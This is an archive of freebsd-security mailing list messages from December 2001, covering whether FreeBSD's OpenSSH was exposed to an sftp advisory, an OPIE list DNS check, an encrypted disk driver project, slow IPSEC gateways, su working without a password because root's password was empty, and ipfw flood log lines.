Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


"Peter C. Lai" wrote:
> 
> afaik, winscp does not have ssh2 capability.
> Because of that, we have migrated to the sftp-client from www.ssh.com
... 
> > Not trying to outdo you, but a win gui scp client is nicer :)
> > http://winscp.vse.cz/eng/
> >
> > PuTTY-based (I believe) and now incorporates v2 and pagent
> > support, amongst other things.

Re-read the line above -> "..now incorporates v2 ... support..."

New feature in version 2 (still beta tho).

-- 
Andrew Johns

================================================================
BUGS:This utility is a prototype which lasted several years past
its expiration date and is greatly in need of death.
                              - from FreeBSD sysinstall man page

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 18:54:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from shemp.palomine.net (shemp.palomine.net [216.135.64.135])
	by hub.freebsd.org (Postfix) with SMTP id 8F38737B417
	for <security@freebsd.org>; Mon,  3 Dec 2001 18:54:14 -0800 (PST)
Received: (qmail 88786 invoked by uid 1000); 4 Dec 2001 02:54:13 -0000
Date: Mon, 3 Dec 2001 21:54:13 -0500
From: Chris Johnson <cjohnson@palomine.net>
To: Holtor <holtor@yahoo.com>
Cc: security@freebsd.org
Subject: Re: OpenSSH Vulnerability
Message-ID: <20011203215413.A88761@palomine.net>
References: <20011203213708.A88390@palomine.net> <20011204024718.74912.qmail@web11601.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="n8g4imXOkfNTN/H1"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011204024718.74912.qmail@web11601.mail.yahoo.com>; from holtor@yahoo.com on Mon, Dec 03, 2001 at 06:47:18PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--n8g4imXOkfNTN/H1
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Mon, Dec 03, 2001 at 06:47:18PM -0800, Holtor wrote:
> It is enabled here:
>=20
> /usr/src/crypto/openssh/sshd_config
>=20
> Thats the only sshd_config in /usr/src besides the one in picobsd so I fi=
gure
> its what should be used when upgrading a system. I don't think mergemaster
> updates anything in /etc/ssh because nothing exists in /usr/src/etc/ssh --
> probably am wrong though.

Ahh... I was looking at a 4.4-RELEASE box, where it's not enabled. On my
4.4-STABLE boxes it appears that it is.

> Just wondering also how people go about updating their sshd_config. I know
> there was many changes when freebsd changed from openssh 2.3.0 to openssh
> 2.9.

Chris

--n8g4imXOkfNTN/H1
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8DDrVyeUEMvtGLWERAhZ/AJ9MwFpouUogcUFkaLo9yUfE45QqMgCgu51G
loEZkyc3AP4QICxhtnEgAcc=
=oBhO
-----END PGP SIGNATURE-----

--n8g4imXOkfNTN/H1--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Mon Dec  3 19:57:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pogo.caustic.org (caustic.org [64.163.147.186])
	by hub.freebsd.org (Postfix) with ESMTP id 9A33D37B417
	for <security@FreeBSD.ORG>; Mon,  3 Dec 2001 19:57:12 -0800 (PST)
Received: from localhost (jan@localhost)
	by pogo.caustic.org (8.11.6/8.11.6) with ESMTP id fB43vCo96175;
	Mon, 3 Dec 2001 19:57:12 -0800 (PST)
	(envelope-from jan@caustic.org)
Date: Mon, 3 Dec 2001 19:57:11 -0800 (PST)
From: "f.johan.beisser" <jan@caustic.org>
X-X-Sender:  <jan@localhost>
To: Holtor <holtor@yahoo.com>
Cc: <security@FreeBSD.ORG>
Subject: Re: OpenSSH Vulnerability
In-Reply-To: <20011204022811.7604.qmail@web11603.mail.yahoo.com>
Message-ID: <20011203195401.M16958-100000@localhost>
X-Ignore: This statement isn't supposed to be read by you
X-TO-THE-FBI-CIA-AND-NSA: HI! HOW YA DOIN?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Mon, 3 Dec 2001, Holtor wrote:

> The advisory says all versions prior to 2.9.9 are
> vulnerable and I see sftp-server is on by default in
> freebsd's sshd_config and freebsd has version 2.9
>
> Ideas?

no, it's not.

OpenSSH was patched against this a while ago. my understanding is that
FreeBSD's version was patched not all that long ago.

the temporary fix was to close off sftp. with the upgrade, the "bad
behaviour" was fixed.


-------/ f. johan beisser /--------------------------------------+
  http://caustic.org/~jan                      jan@caustic.org
    "John Ashcroft is really just the reanimated corpse
         of J. Edgar Hoover." -- Tim Triche


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  0:52:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from scaup.prod.itd.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49])
	by hub.freebsd.org (Postfix) with ESMTP id 2FF0D37B41A
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 00:52:21 -0800 (PST)
Received: from dialup-209.245.134.132.dial1.sanjose1.level3.net ([209.245.134.132] helo=blossom.cjclark.org)
	by scaup.prod.itd.earthlink.net with esmtp (Exim 3.33 #1)
	id 16BBJH-00038G-00; Tue, 04 Dec 2001 00:52:15 -0800
Received: (from cjc@localhost)
	by blossom.cjclark.org (8.11.6/8.11.3) id fB48qBG38420;
	Tue, 4 Dec 2001 00:52:11 -0800 (PST)
	(envelope-from cjc)
Date: Tue, 4 Dec 2001 00:52:11 -0800
From: "Crist J . Clark" <cjc@FreeBSD.ORG>
To: Peter Jeremy <peter.jeremy@alcatel.com.au>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: OPIE mailing list
Message-ID: <20011204005211.B37981@blossom.cjclark.org>
References: <20011204120431.A67179@gsmx07.alcatel.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011204120431.A67179@gsmx07.alcatel.com.au>; from peter.jeremy@alcatel.com.au on Tue, Dec 04, 2001 at 12:04:32PM +1100
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Tue, Dec 04, 2001 at 12:04:32PM +1100, Peter Jeremy wrote:
> [OK, this is somewhat off-topic, but it is security related]
>    
> According to opie(4), "OPIE is discussed on the Bellcore `S/Key Users/
> mailing list ... skey-users-request@thumper.bellcore.com".  Is this
> still correct?  I can't get any DNS information for either either
> thumper.bellcore.com or bellcore.com (as in "no response", not "not
> found").

Can't tell you if it's active, but DNS seems fine,

  $ dig thumper.bellcore.com mx
  
  ; <<>> DiG 8.3 <<>> thumper.bellcore.com mx 
  ;; res options: init recurs defnam dnsrch
  ;; got answer:
  ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4
  ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 4
  ;; QUERY SECTION:
  ;;      thumper.bellcore.com, type = MX, class = IN
  
  ;; ANSWER SECTION:
  thumper.bellcore.com.   14m2s IN MX     20 ccdnsmx1.cc.telcordia.com.
  thumper.bellcore.com.   14m2s IN MX     20 express.cc.telcordia.com.
  thumper.bellcore.com.   14m2s IN MX     10 gpu1pya.cc.telcordia.com.
  
  ;; AUTHORITY SECTION:
  bellcore.com.           14m2s IN NS     ns.bellcore.com.
  bellcore.com.           14m2s IN NS     dns.bellcore.com.
  
  ;; ADDITIONAL SECTION:
  ccdnsmx1.cc.telcordia.com.  1S IN A  128.96.96.138
  gpu1pya.cc.telcordia.com.  5S IN A  128.96.48.38
  ns.bellcore.com.        1d12h18m36s IN A  128.96.41.1
  dns.bellcore.com.       1d12h18m36s IN A  128.96.41.3
  
  ;; Total query time: 3 msec
  ;; FROM: blossom.cjclark.org to SERVER: default -- 127.0.0.1
  ;; WHEN: Tue Dec  4 00:50:40 2001
  ;; MSG SIZE  sent: 38  rcvd: 223

-- 
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  1:55: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from un.infosec.ru (un.infosec.ru [194.135.141.99])
	by hub.freebsd.org (Postfix) with ESMTP id DBB6637B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 01:55:03 -0800 (PST)
Received: from infosec.ru (IDENT:blaze@localhost [127.0.0.1])
	by un.infosec.ru (8.11.3/8.10.1) with ESMTP id fB49soa06769
	for <freebsd-security@freebsd.org>; Tue, 4 Dec 2001 12:54:53 +0300 (MSK)
Message-Id: <200112040954.fB49soa06769@un.infosec.ru>
To: freebsd-security@freebsd.org
Subject: cryptographic disk driver
Date: Tue, 04 Dec 2001 12:54:50 +0300
From: Andrey Sverdlichenko <blaze@infosec.ru>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I'm currently working on cryptographic disk driver for FreeBSD, based on
vn(4). Project now is in beta stage: driver works stable, but user-level
tools are embrionic. Testing and suggestions are welcome.

Sources avaliable on SourceForge via anonymous CVS:
cvs -d :pserver:anonymous@cvs.vncrypt.sf.net:/cvsroot/vncrypt checkout
src

Project homepage: http://vncrypt.sf.net


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  3:10:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from secure.stargate.net (secure.stargate.net [209.166.165.218])
	by hub.freebsd.org (Postfix) with SMTP id 684A037B417
	for <security@freebsd.org>; Tue,  4 Dec 2001 03:10:17 -0800 (PST)
Received: (qmail 16366 invoked from network); 4 Dec 2001 11:10:21 -0000
Received: from unknown (HELO localhost) (127.0.0.1)
  by localhost with SMTP; 4 Dec 2001 11:10:21 -0000
Date: Tue, 4 Dec 2001 06:10:14 -0500 (EST)
From: SecLists <lists@secure.stargate.net>
To: Chris Johnson <cjohnson@palomine.net>
Cc: Holtor <holtor@yahoo.com>,
	"security@freebsd.org" <security@freebsd.org>
Subject: Re: OpenSSH Vulnerability
In-Reply-To: <20011203213708.A88390@palomine.net>
Message-ID: <Pine.BSO.4.42L0.0112040609180.13776-100000@secure.stargate.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Not sure if you are talking about the freebsd package or the portable
source, but a portable source installation enables sftp by default... just
did one tonight on Solaris 8, OpenSSH 3.0.2p1

Thanks,
shawn

On Mon, 3 Dec 2001, Chris Johnson wrote:

> On Mon, Dec 03, 2001 at 06:28:11PM -0800, Holtor wrote:
> > Is freebsd's SSH vulnerable to this?
> >
> > http://www.securityfocus.com/archive/1/243430
> >
> > The advisory says all versions prior to 2.9.9 are
> > vulnerable and I see sftp-server is on by default in
> > freebsd's sshd_config
>
> How do you figure that? I see:
>
> # Uncomment if you want to enable sftp
> #Subsystem      sftp    /usr/libexec/sftp-server
>
> in my /etc/ssh/sshd_config file, and the sshd man page says, "By default no
> subsystems are defined."
>
> Chris Johnson
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (OpenBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8DK8d3Qw8DHute6kRApomAJ4i6ZtN0NUBvTI3gzon87Tai2G+pwCglqo9
Y8hNXjxgtmkxwGpqLXYd9jc=
=LT06
-----END PGP SIGNATURE-----


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  4:47:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web21206.mail.yahoo.com (web21206.mail.yahoo.com [216.136.175.8])
	by hub.freebsd.org (Postfix) with SMTP id 97F6037B416
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 04:47:35 -0800 (PST)
Message-ID: <20011204124735.46928.qmail@web21206.mail.yahoo.com>
Received: from [62.153.168.98] by web21206.mail.yahoo.com via HTTP; Tue, 04 Dec 2001 04:47:35 PST
Date: Tue, 4 Dec 2001 04:47:35 -0800 (PST)
From: Trent Tobias <tritttrott@yahoo.com>
Subject: Speeding up IPSEC Gateway
To: freebsd-security@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

I currently have 3 IPSEC Gateways set up with
4.4-STABLE running on 1.5GHz machines.  It is a fully
meshed setup (all is connected to all via IPSEC ESP
Tunnels, using gif).

All three boxes have 128kbit connections to the
internet, but it seems like my maximum connection
speed between my 3 local nets only reaches approx
30kbits/s (i use bing to determine this).

I realise that encryption/decryption takes its toll in
the kernel relaying the packets, but this slow?

My only guess is that I am using the wrong parameters
for encryption - I am using the default config for
racoon with longer (8 hours) key lifetimes.

Trent

__________________________________________________
Do You Yahoo!?
Buy the perfect holiday gifts at Yahoo! Shopping.
http://shopping.yahoo.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  7: 6:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.axelero.hu (cmail.axelero.hu [195.228.240.83])
	by hub.freebsd.org (Postfix) with SMTP id 1A84E37B416
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 07:06:34 -0800 (PST)
Received: (qmail 24923 invoked from network); 4 Dec 2001 16:04:05 +0100
Received: from adsl246.225.axelero.hu (HELO nt) (195.228.225.246)
  by mail.axelero.hu with SMTP; 4 Dec 2001 16:04:05 +0100
Message-ID: <003901c17cdb$8eec7df0$04e3a8c0@beco.hu>
From: "berta" <berta@beco.hu>
To: <freebsd-security@freebsd.org>
Subject: su to root without passwd
Date: Tue, 4 Dec 2001 16:51:34 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi,

There are two FreeBSD 4.4-STABLE #2 boxes, I am a user and member of
the wheel group on both.
On one the su command does not ask for password,
immediatelly returns the # prompt, while on the other
ask for the root password.
I do not see any difference in the following files:
auth.conf 
login.conf
pam.conf
ttys
sshd_config

.. I have no idea.

S.Berta


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  7: 7:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40])
	by hub.freebsd.org (Postfix) with ESMTP id 365E137B405
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 07:07:51 -0800 (PST)
Received: by peitho.fxp.org (Postfix, from userid 1501)
	id 90CA113651; Tue,  4 Dec 2001 10:07:50 -0500 (EST)
Date: Tue, 4 Dec 2001 10:07:50 -0500
From: Chris Faulhaber <jedgar@fxp.org>
To: berta <berta@beco.hu>
Cc: freebsd-security@freebsd.org
Subject: Re: su to root without passwd
Message-ID: <20011204100750.A42579@peitho.fxp.org>
Mail-Followup-To: Chris Faulhaber <jedgar@fxp.org>,
	berta <berta@beco.hu>, freebsd-security@freebsd.org
References: <003901c17cdb$8eec7df0$04e3a8c0@beco.hu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="r5Pyd7+fXNt84Ff3"
Content-Disposition: inline
In-Reply-To: <003901c17cdb$8eec7df0$04e3a8c0@beco.hu>
User-Agent: Mutt/1.3.20i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--r5Pyd7+fXNt84Ff3
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Dec 04, 2001 at 04:51:34PM +0100, berta wrote:
> Hi,
>=20
> There are two FreeBSD 4.4-STABLE #2 boxes, I am a user and member of
> the wheel group on both.
> On one the su command does not ask for password,
> immediatelly returns the # prompt, while on the other
> ask for the root password.
> I do not see any difference in the following files:
> auth.conf=20
> login.conf
> pam.conf
> ttys
> sshd_config
>=20
> .. I have no idea.
>=20

Tried setting a root password?

--=20
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve   -   http://www.FreeBSD.org

--r5Pyd7+fXNt84Ff3
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: FreeBSD: The Power To Serve

iEYEARECAAYFAjwM5sYACgkQObaG4P6BelC0EwCfWqBPbTOXouEDRximL7Tgxlmq
EzUAnRonQJQvcP8YiAOSJWPQRDPONW+R
=gcyd
-----END PGP SIGNATURE-----

--r5Pyd7+fXNt84Ff3--

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  7: 9:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from secure.stargate.net (secure.stargate.net [209.166.165.218])
	by hub.freebsd.org (Postfix) with SMTP id 67DBF37B417
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 07:09:22 -0800 (PST)
Received: (qmail 29448 invoked from network); 4 Dec 2001 15:09:18 -0000
Received: from unknown (HELO localhost) (127.0.0.1)
  by localhost with SMTP; 4 Dec 2001 15:09:18 -0000
Date: Tue, 4 Dec 2001 10:09:11 -0500 (EST)
From: SecLists <lists@secure.stargate.net>
To: berta <berta@beco.hu>
Cc: "freebsd-security@freebsd.org" <freebsd-security@freebsd.org>
Subject: Re: su to root without passwd
In-Reply-To: <003901c17cdb$8eec7df0$04e3a8c0@beco.hu>
Message-ID: <Pine.BSO.4.42L0.0112041008520.13776-100000@secure.stargate.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The only other time I have seen this is when root didnt have a password...

thanks,
shawn

On Tue, 4 Dec 2001, berta wrote:

> Hi,
>
> There are two FreeBSD 4.4-STABLE #2 boxes, I am a user and member of
> the wheel group on both.
> On one the su command does not ask for password,
> immediatelly returns the # prompt, while on the other
> ask for the root password.
> I do not see any difference in the following files:
> auth.conf
> login.conf
> pam.conf
> ttys
> sshd_config
>
> .. I have no idea.
>
> S.Berta
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (OpenBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8DOce3Qw8DHute6kRAi/4AJ0f37pEYk0XgkRJoGB7gX2J/vjuqgCeOH/f
tDffOtuaYmBjz/A4cjI/qVU=
=wvgc
-----END PGP SIGNATURE-----


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  7:34: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.axelero.hu (cmail.axelero.hu [195.228.240.83])
	by hub.freebsd.org (Postfix) with SMTP id 5028237B41F
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 07:33:44 -0800 (PST)
Received: (qmail 22025 invoked from network); 4 Dec 2001 16:33:41 +0100
Received: from adsl246.225.axelero.hu (HELO beco.hu) (195.228.225.246)
  by mail.axelero.hu with SMTP; 4 Dec 2001 16:33:41 +0100
Received: from nt (nt.beco.hu [192.168.227.4])
	by beco.hu (8.11.6/8.11.6) with SMTP id fB4GbN900611
	for <freebsd-security@freebsd.org>; Tue, 4 Dec 2001 16:37:31 GMT
	(envelope-from berta@beco.beco.hu)
Message-ID: <006001c17cdf$ab181d00$04e3a8c0@beco.hu>
From: "berta_beco" <berta@beco.hu>
To: <freebsd-security@freebsd.org>
Subject: su to root without passwd 2
Date: Tue, 4 Dec 2001 17:20:55 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

>Tried setting a root password?
>
>-- 
> Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
>--------------------------------------------------------
>FreeBSD: The Power To Serve   -   http://www.FreeBSD.org

Yes, that's it! Thanks!
But in the security check output:

"Checking for passwordless accounts:"

was empty!
S.Berta


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  8: 1:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.axelero.hu (cmail.axelero.hu [195.228.240.83])
	by hub.freebsd.org (Postfix) with SMTP id 524E837B405
	for <freebsd-security@freebsd.org>; Tue,  4 Dec 2001 08:01:27 -0800 (PST)
Received: (qmail 27555 invoked from network); 4 Dec 2001 17:01:24 +0100
Received: from adsl246.225.axelero.hu (HELO nt) (195.228.225.246)
  by mail.axelero.hu with SMTP; 4 Dec 2001 17:01:24 +0100
Message-ID: <008d01c17ce3$910c08f0$04e3a8c0@beco.hu>
From: "beco" <beco@beco.hu>
To: <freebsd-security@freebsd.org>
References: <006001c17cdf$ab181d00$04e3a8c0@beco.hu>
Subject: Re: su to root without passwd 2
Date: Tue, 4 Dec 2001 17:48:46 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Sorry, I have alreday found!
There were too many unread messages for root.
The upgrade from 4.0 from a cvs source did not work,
and we had to do it from a 4.3 CD.
This was the time, when the root password was cleared.

S.Berta


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Tue Dec  4  8:24: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP id D357C37B419
	for <security@freebsd.org>; Tue,  4 Dec 2001 08:24:03 -0800 (PST)
Received: from fazendinha (ressacada.melim.com.br [200.215.110.4])
	by salseiros.melim.com.br (Postfix) with SMTP id 9E635BA9E
	for <security@freebsd.org>; Tue,  4 Dec 2001 14:24:00 -0200 (BRST)
Message-ID: <10f701c17ce0$56141600$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: <security@freebsd.org>
References: <006001c17cdf$ab181d00$04e3a8c0@beco.hu> <008d01c17ce3$910c08f0$04e3a8c0@beco.hu>
Subject: Attack logs
Date: Tue, 4 Dec 2001 14:25:49 -0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-2"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi All,

I hava seem that older versions of FreeBSD had mored detailed logs.

For example:
When some one did a flood, it had show a log like this:

Dec  4 14:15:30 server /kernel: ipfw: 3200 Deny ICMP:8.0 210.90.188.221
192.168.1.224 in via xl0
Dec  4 14:15:30 server /kernel: ipfw: 3200 Deny ICMP:8.0 210.90.188.221
192.168.1.224 in via xl0
